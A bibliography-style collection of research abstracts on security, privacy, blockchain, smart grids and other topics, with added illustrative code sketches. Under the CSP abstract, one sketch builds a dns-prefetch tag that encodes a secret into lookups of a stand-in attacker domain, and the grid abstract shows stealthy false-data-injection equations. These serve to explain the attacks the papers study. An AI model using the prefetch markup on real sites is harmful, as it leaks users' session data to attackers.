Bibliography
This paper describes a data-driven approach to studying the science of cyber security (SoS). It argues that science is driven by data, and it then describes issues and approaches for the following three aspects: (i) Data-Driven Science for Attack Detection and Mitigation, (ii) Foundations for Data Trustworthiness and Policy-Based Sharing, and (iii) A Risk-Based Approach to Security Metrics. We believe that the three aspects addressed in this paper will form the basis for studying the Science of Cyber Security.
Large-scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes it difficult to secure the applications running within them. We motivate this setting with a complex real-world scenario and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, focusing in particular on inducing so-called whitelist communication policies from observations of masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machines, or groups of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, and the difficulty of evaluation, and describe some of the approaches we have found promising.
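As a concrete illustration of the kind of policy induction involved, the sketch below (ours, not the authors'; the grouping feature and support threshold are deliberate simplifications) groups hosts by the set of destination ports they contact and whitelists only group-to-group edges observed often enough:

    # Minimal sketch of inducing a whitelist policy from observed flows.
    # Hosts are grouped by the set of destination ports they contact (a
    # stand-in for richer features a real system would use); a group-to-group
    # edge is whitelisted only if seen at least `min_support` times.
    from collections import Counter, defaultdict

    def induce_whitelist(flows, min_support=5):
        """flows: iterable of (src_host, dst_host, dst_port) tuples."""
        profile = defaultdict(set)
        for src, dst, port in flows:
            profile[src].add(port)
        group_of = {h: frozenset(ports) for h, ports in profile.items()}

        # Count observed group-to-group edges; keep the well-supported ones.
        support = Counter()
        for src, dst, port in flows:
            g_src = group_of.get(src, frozenset())
            g_dst = group_of.get(dst, frozenset())
            support[(g_src, g_dst, port)] += 1
        return {edge for edge, n in support.items() if n >= min_support}

    flows = [("web1", "db1", 5432)] * 6 + [("web1", "mail1", 25)]  # toy data
    policy = induce_whitelist(flows)
    print(len(policy), "whitelisted group edges")  # -> 1 (the rare edge is dropped)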
In this study, we use a multi-party recording as a template for building a parametric speech synthesiser that is able to express different levels of attentiveness in backchannel tokens. This allows us to investigate i) whether it is possible to express the same perceived level of attentiveness in synthesised backchannels as in natural ones; and ii) whether it is possible to increase and decrease the perceived level of attentiveness of backchannels beyond the range observed in the original corpus.
Smart grid technologies enable new business models for domestic consumers with local flexibility (generation, loads, storage), where access to data is a key requirement in the value stream. However, legislation on personal data privacy and protection imposes the need to develop local models for flexibility modeling and forecasting and to exchange models instead of personal data. This paper describes the functional architecture of a home energy management system (HEMS) and its optimization functions. A set of data-driven models, embedded in the HEMS, is discussed for improving renewable energy forecasting skill and for modeling the multi-period flexibility of distributed energy resources.
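To make the flexibility-modeling task concrete, here is a minimal sketch (our illustration, with hypothetical battery parameters and a simplified efficiency model applied to charging only) of a per-period flexibility envelope around a baseline schedule:

    # Minimal sketch of multi-period flexibility for a home battery: for each
    # period, the feasible deviation band around a baseline charging schedule,
    # limited by the power rating and the carried-over state of charge.
    # All parameters are hypothetical; charging power is positive.
    def flexibility_envelope(soc0, e_max, p_max, baseline, dt=1.0, eff=0.95):
        """Return per-period (down, up) power deviations around `baseline`."""
        soc, bands = soc0, []
        for p_base in baseline:
            up = min(p_max - p_base, (e_max - soc) / (eff * dt) - p_base)
            down = min(p_max + p_base, soc * eff / dt + p_base)
            bands.append((-down, up))
            soc += eff * p_base * dt          # follow the baseline schedule
            soc = min(max(soc, 0.0), e_max)
        return bands

    print(flexibility_envelope(soc0=2.0, e_max=5.0, p_max=3.0, baseline=[1.0, 0.0]))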
Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) instructs the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.
This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.
As a consequence of this discord, we report on insecurities in known protection mechanisms that rest on assumptions about CSP that turn out not to hold in practice.
To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.
Our study of popular browsers demonstrates that it is often possible to exfiltrate data through both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the coexistence of CSP and prefetching in practice. Finally, we discuss directions for controlling data exfiltration and, for the case study, propose measures ranging from immediate fixes for clients to prefetching-aware extensions of CSP.
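To make the channel concrete, the following sketch (ours; the domain and secret are hypothetical) shows how a secret can be encoded into DNS labels and exposed through a dns-prefetch hint, the mechanism whose interaction with CSP the study probes:

    # Minimal sketch of the exfiltration channel: a secret is hex-encoded into
    # DNS labels of an attacker-controlled zone, and a prefetch hint is injected
    # into the page. CSP governs fetches, but the DNS lookup triggered by the
    # hint may escape it; whether it does is the paper's empirical question.
    def dns_exfil_markup(secret: bytes, attacker_zone: str = "evil.example") -> str:
        encoded = secret.hex()
        # DNS labels are limited to 63 characters; split accordingly.
        labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
        host = ".".join(labels + [attacker_zone])
        return f'<link rel="dns-prefetch" href="//{host}">'

    print(dns_exfil_markup(b"session=deadbeef"))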
Cyber crime produces huge volumes of log and transactional data, all of which must be stored and analyzed, and it is difficult for forensic investigators to find the time to locate clues within such volumes. Network forensic analysis involves network traces and the detection of attacks. The traces include Intrusion Detection System and firewall logs, logs generated by network services and applications, and packet captures from sniffers. Network forensics deals with the monitoring, capturing, recording, and analysis of network traffic in order to detect intrusions and investigate them. This paper focuses on data collection from the cyber system and the web browser. FTK 4.0 is discussed for memory forensic analysis and remote system forensics, the results of which can be used as evidence to aid an investigation.
We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.
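A minimal sketch of the embedding idea, under our simplifying assumptions (integer sensor samples, least-significant-bit embedding, payload already encrypted before the call), is:

    # Minimal sketch: hide bits of a pre-encrypted payload in the least
    # significant bit of integer sensor samples, bounding distortion to one
    # quantization step per sample. Parameters are illustrative only.
    def embed(samples, payload: bytes):
        bits = [(byte >> i) & 1 for byte in payload for i in range(8)]
        if len(bits) > len(samples):
            raise ValueError("carrier too short for payload")
        return [(s & ~1) | b for s, b in zip(samples, bits)] + samples[len(bits):]

    def extract(samples, n_bytes: int):
        bits = [s & 1 for s in samples[:8 * n_bytes]]
        return bytes(sum(bits[8 * i + j] << j for j in range(8))
                     for i in range(n_bytes))

    carrier = list(range(100, 150))        # stand-in accelerometer samples
    stego = embed(carrier, b"key")
    assert extract(stego, 3) == b"key"     # payload round-trips losslessly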
Deregulated electricity markets rely on a two-settlement system consisting of day-ahead and real-time markets, across which the electricity price is volatile. In such markets, locational marginal pricing is widely adopted to set electricity prices and manage transmission congestion. Locational marginal prices are vulnerable to maliciously introduced measurement errors. Existing studies show that omniscient adversaries can design profitable attack strategies without being detected by residue-based bad-data detectors. This paper focuses on a more realistic setting, in which the attackers have only partial and imperfect information due to their limited resources and restricted physical access to the grid. Specifically, the attackers are assumed to have uncertainty about the state of the grid, and this uncertainty is modeled stochastically. Based on this model, the paper offers a framework for characterizing optimal stochastic guarantees for the effectiveness of the attacks and the associated pricing impacts.
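For context, the residue-based detection that such attacks must evade is usually formalized with the DC state-estimation model below (our notation; this is the standard formulation in this literature, not the paper's stochastic variant, which replaces the attacker's exact knowledge with a distribution):

    % Measurements z, state x, measurement Jacobian H, weight matrix W, noise e.
    \begin{align*}
      z &= Hx + e, \qquad \hat{x} = (H^{\top}WH)^{-1}H^{\top}Wz,\\
      r &= z - H\hat{x}, \qquad \text{alarm if } \lVert r \rVert > \tau,\\
      a &= Hc \;\Rightarrow\; r_{\text{attacked}} = r
          \quad \text{(the attack is invisible to the residue test).}
    \end{align*}

An omniscient attacker can pick such an undetectable vector a = Hc directly; with only stochastic knowledge of the grid state, the paper instead characterizes probabilistic guarantees on the attack's effectiveness.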
Cyber infrastructures are highly vulnerable to intrusions and other threats. The main challenges in cloud computing are the failure of data centres, the recovery of lost data, and the provision of a data security system. This paper proposes Virtualization and Data Recovery, which creates a virtual environment and recovers lost data from data servers and agents in order to provide data security in a cloud environment. A Cloud Manager is used to manage the virtualization and to handle faults. An erasure code algorithm is used to recover the data: it first separates the data into n parts, then encrypts them and stores them on data servers. A semi-trusted third party, as well as malware-induced changes to data stored in the data centres, can be identified by artificial-intelligence methods using agents. The Java Agent Development Framework (JADE) is a tool for developing agents; it facilitates communication between agents and enables the computing services in the system. The framework is designed and implemented in Java as a gateway or firewall for recovering from data loss.
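As an illustration of the split-and-recover idea, the following sketch (ours; it uses a single XOR parity part, whereas practical systems use Reed-Solomon codes, and the per-part encryption step described in the abstract is assumed to wrap it) splits data into n parts plus one parity part and rebuilds any single lost part:

    # Minimal sketch of erasure-coded recovery with one XOR parity block:
    # any one of the n+1 stored parts can be lost and rebuilt from the rest.
    from functools import reduce

    def _xor(a: bytes, b: bytes) -> bytes:
        return bytes(x ^ y for x, y in zip(a, b))

    def split(data: bytes, n: int):
        size = -(-len(data) // n)                     # ceiling division
        parts = [data[i * size:(i + 1) * size].ljust(size, b"\0")
                 for i in range(n)]
        return parts + [reduce(_xor, parts)]          # n data parts + parity

    def recover(parts, lost: int):
        present = [p for i, p in enumerate(parts) if i != lost and p is not None]
        return reduce(_xor, present)                  # XOR of the rest rebuilds it

    stored = split(b"cloud record", n=3)
    rebuilt = recover(stored[:2] + [None] + stored[3:], lost=2)
    assert rebuilt == stored[2]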
Existing data management and searching systems for the Internet of Things use a centralized database. As a result, these server-based systems exhibit security vulnerabilities such as IP spoofing, a single point of failure, and Sybil attacks. This paper proposes a data management system based on blockchain, which ensures security by using ECDSA digital signatures and the SHA-256 hash function. The location, indicated by the IP address of the data owner, and the data name are recorded in a block included in the blockchain. Furthermore, we devise a data management and searching method based on analyzing the block hash value. By using security properties of the blockchain such as authentication, non-repudiation, and data integrity, this system has a security advantage over previous data management and searching systems that use a centralized database or P2P networks.
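A minimal sketch of the block layout described above (our illustration; the ECDSA signature over the block hash is assumed and elided to keep the code dependency-free) is:

    # Minimal sketch: the owner's IP-derived location and the data name are
    # hashed into a SHA-256-chained block; searching can walk the hash chain.
    import hashlib, json, time

    def make_block(prev_hash: str, owner_ip: str, data_name: str) -> dict:
        body = {"prev": prev_hash, "owner_ip": owner_ip,
                "data_name": data_name, "ts": time.time()}
        body["hash"] = hashlib.sha256(
            json.dumps(body, sort_keys=True).encode()).hexdigest()
        return body                       # an ECDSA signature would sign body["hash"]

    genesis = make_block("0" * 64, "203.0.113.7", "sensor-42/temperature")
    nxt = make_block(genesis["hash"], "203.0.113.9", "sensor-17/humidity")
    assert nxt["prev"] == genesis["hash"]   # lookups can follow the chain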
Supply chain management (SCM) is fundamental for gaining financial, environmental, and social benefits in the supply chain industry. However, traditional SCM mechanisms usually suffer from a wide range of issues, such as a lack of information sharing, long delays in data retrieval, and unreliable product tracing. Recent advances in blockchain technology show great potential to tackle these issues thanks to its salient features, including immutability, transparency, and decentralization. Although there are proof-of-concept studies and surveys on blockchain-based SCM from the perspective of logistics, the underlying technical challenges have not been clearly identified. In this paper, we provide a comprehensive analysis of the potential opportunities, new requirements, and principles for designing blockchain-based SCM systems. We summarize and discuss four crucial technical challenges, namely scalability, throughput, access control, and data retrieval, and review promising solutions. Finally, a case study on designing a blockchain-based food traceability system is reported to provide more insight into how to tackle these technical challenges in practice.
Expectations for cryptocurrencies have risen rapidly, and all of these cryptocurrencies are built on blockchain platforms. This means not only that the paradigm is changing in the field of finance but also that the blockchain platform is technically stable. Building on this stability, many kinds of cryptocurrencies and application platforms are being implemented or released, and world-famous banks are applying blockchain to their financial services [1]. Even laws for exchanging cryptocurrencies are being discussed. Furthermore, blockchain platforms also run programmed source code, called a smart contract, on their distributed platform; smart contracts extend the uses of the blockchain platform. In this paper, we therefore propose an algorithm for recording and managing the location data of IoT service providers and users on a blockchain with smart contracts. Our proposal records participants' data in the network on a blockchain, which ensures security, and matches each participant with the best-suited counterpart through spatial data processing.
With the arrival of the big data era, information privacy and security issues have become even more crucial. The Mining Associations with Secrecy Konstraints (MASK) algorithm and its improved versions were proposed as data-mining approaches for privacy-preserving association rules. The MASK algorithm adopts only a data perturbation strategy, which leads to a low degree of privacy preservation. Moreover, it is difficult to apply the MASK algorithm in practice because of its long execution time. This paper proposes a new algorithm based on data perturbation and query restriction (DPQR) that improves the degree of privacy preservation through multi-parameter perturbation. To improve time efficiency, the calculation of the inverse matrix is simplified by dividing the matrix into blocks; meanwhile, a further optimization reduces the number of database scans using set theory. Both theoretical analyses and experimental results show that the proposed DPQR algorithm performs better.
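To illustrate MASK-style perturbation, the following sketch (ours, with illustrative parameters rather than the paper's) flips each 0/1 item flag with a fixed probability and then de-biases the observed frequency analytically:

    # Minimal sketch of MASK-style randomization: each bit is kept with
    # probability p and flipped otherwise; the miner recovers the true item
    # frequency from the observed one without seeing individual true values.
    import random

    def perturb(bits, p=0.9):
        return [b if random.random() < p else 1 - b for b in bits]

    def debias(observed_freq, p=0.9):
        # E[observed] = p*f + (1-p)*(1-f)  =>  f = (observed - (1-p)) / (2p - 1)
        return (observed_freq - (1 - p)) / (2 * p - 1)

    random.seed(0)
    true_bits = [1] * 300 + [0] * 700              # true support = 0.30
    noisy = perturb(true_bits)
    est = debias(sum(noisy) / len(noisy))
    print(f"estimated support ~= {est:.2f}")       # close to 0.30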
As cloud computing becomes increasingly pervasive, it is critical for cloud providers to support basic security controls. Although major cloud providers tout such features, relatively little is known in many cases about their design and implementation. In this paper, we describe several security features in OpenStack, a widely used, open source cloud computing platform. Our contributions to OpenStack range from key management and storage encryption to guaranteeing the integrity of virtual machine (VM) images prior to boot. We describe the design and implementation of these features in detail and provide a security analysis that enumerates the threats each one mitigates. Our performance evaluation shows that these security features have an acceptable cost; in some cases, the cost is within the measurement error observed in an operational cloud deployment. Finally, we highlight lessons learned from our real-world development experience contributing these features to OpenStack, as a way to encourage others to transition their research into practice.
Cloud computing has established itself as an alternative IT infrastructure and service model. However, as with all logically centralized resource and service provisioning infrastructures, the cloud does not handle local issues involving large numbers of networked elements (IoT devices) well, and it is not responsive enough for many applications that require the immediate attention of a local controller. Fog computing preserves many benefits of cloud computing, and it is also well positioned to address these locality and performance issues because its resources and specific services are virtualized and located at the edge, on the customer premises. However, data security is a critical challenge in fog computing, especially when fog nodes and their data move frequently within the environment. This paper addresses the data protection and performance issues by 1) proposing a Region-Based Trust-Aware (RBTA) model for trust translation among fog nodes across regions, 2) introducing Fog-based Privacy-aware Role Based Access Control (FPRBAC) for access control at fog nodes, and 3) developing a mobility management service to handle changes in the locations of users and fog devices. The implementation results demonstrate the feasibility and efficiency of our proposed framework.
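A minimal sketch of the access decision this combination implies (our illustration; roles, trust scores, and the threshold are hypothetical, and the RBTA trust translation is reduced to a table lookup) is:

    # Minimal sketch: grant an action only if the role permits it AND the
    # trust translated from the user's home region to the current region
    # clears a threshold. All names and values below are hypothetical.
    ROLE_PERMS = {"nurse": {"read"}, "physician": {"read", "write"}}
    REGION_TRUST = {("region-A", "region-B"): 0.8, ("region-A", "region-A"): 1.0}

    def allowed(role, action, home_region, current_region, threshold=0.7):
        trust = REGION_TRUST.get((home_region, current_region), 0.0)
        return action in ROLE_PERMS.get(role, set()) and trust >= threshold

    assert allowed("physician", "write", "region-A", "region-B")      # trusted region
    assert not allowed("physician", "write", "region-A", "region-C")  # unknown region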
Cloud forensics investigates crimes committed over cloud infrastructures, such as SLA violations and storage privacy breaches. Cloud storage forensics is the process of recording the history of the creation of, and the operations performed on, a cloud data object, and investigating it. Secure data provenance in the cloud is crucial for data accountability, forensics, and privacy. Towards this, we present a cloud-based data provenance framework using blockchain, which traces data record operations and generates provenance data. Initially, we design a Dropbox-like application using AWS S3 storage. The application provides cloud storage for the students and faculty of the university, thereby making the storage and sharing of work and resources efficient. Later, we design a data provenance mechanism for users' confidential files using the Ethereum blockchain. We also evaluate the proposed system using performance parameters such as query and transaction latency while varying the load and the number of nodes in the blockchain network.
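A minimal sketch of a per-operation provenance record (our illustration; the field names are hypothetical) shows how a compact digest could be committed on-chain while the full record stays off-chain:

    # Minimal sketch: each file operation yields a provenance event whose
    # SHA-256 digest is what would be sent in an Ethereum transaction,
    # keeping the on-chain footprint small.
    import hashlib, json, time

    def provenance_event(user, op, object_key):
        event = {"user": user, "op": op, "object": object_key, "ts": time.time()}
        digest = hashlib.sha256(
            json.dumps(event, sort_keys=True).encode()).hexdigest()
        return event, digest

    evt, h = provenance_event("alice", "UPLOAD", "s3://course-bucket/hw1.pdf")
    print(h[:16], evt["op"])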
Multi-agent simulations are useful for exploring collective patterns of individual behavior in social, biological, economic, network, and physical systems. However, there is no provenance support for multi-agent models (MAMs) in a distributed setting. To this end, we introduce ProvMASS, a novel approach to capturing the provenance of MAMs in distributed memory by combining inter-process identification, lightweight coordination of in-memory provenance storage, and adaptive provenance capture. ProvMASS is built on top of the Multi-Agent Spatial Simulation (MASS) library, a framework that combines multi-agent systems with large-scale, fine-grained agent-based models (MAMs). Unlike other environments supporting MAMs, MASS parallelizes simulations with distributed memory, where agents and spatial data are shared application resources. We evaluate our approach with provenance queries supporting three use cases, along with performance measurements. Initial results indicate that our approach can support a variety of provenance queries for MAMs at reasonable performance overhead.
In the last couple of years, organizations have demonstrated an increased willingness to participate in threat intelligence sharing platforms. The open exchange of information and knowledge regarding threats, vulnerabilities, incidents, and mitigation strategies results from organizations' growing need to protect against today's sophisticated cyber attacks. To investigate the data quality challenges that might arise in threat intelligence sharing, we conducted focus group discussions with ten expert stakeholders from security operations centers of various globally operating organizations. The study addresses several factors affecting shared threat intelligence data quality at multiple levels, including collecting, processing, sharing, and storing data. As expected, the study finds that the main factors affecting shared threat intelligence data stem from the limitations and complexities associated with integrating and consolidating shared threat intelligence from different sources while ensuring the data's usefulness for an inhomogeneous group of participants. Data quality is extremely important for shared threat intelligence. As our study has shown, there are no fundamentally new data quality issues in threat intelligence sharing. However, as threat intelligence sharing is an emerging domain, and a large number of threat intelligence sharing tools are currently being rushed to market, several data quality issues, particularly those related to scalability and data source integration, deserve particular attention.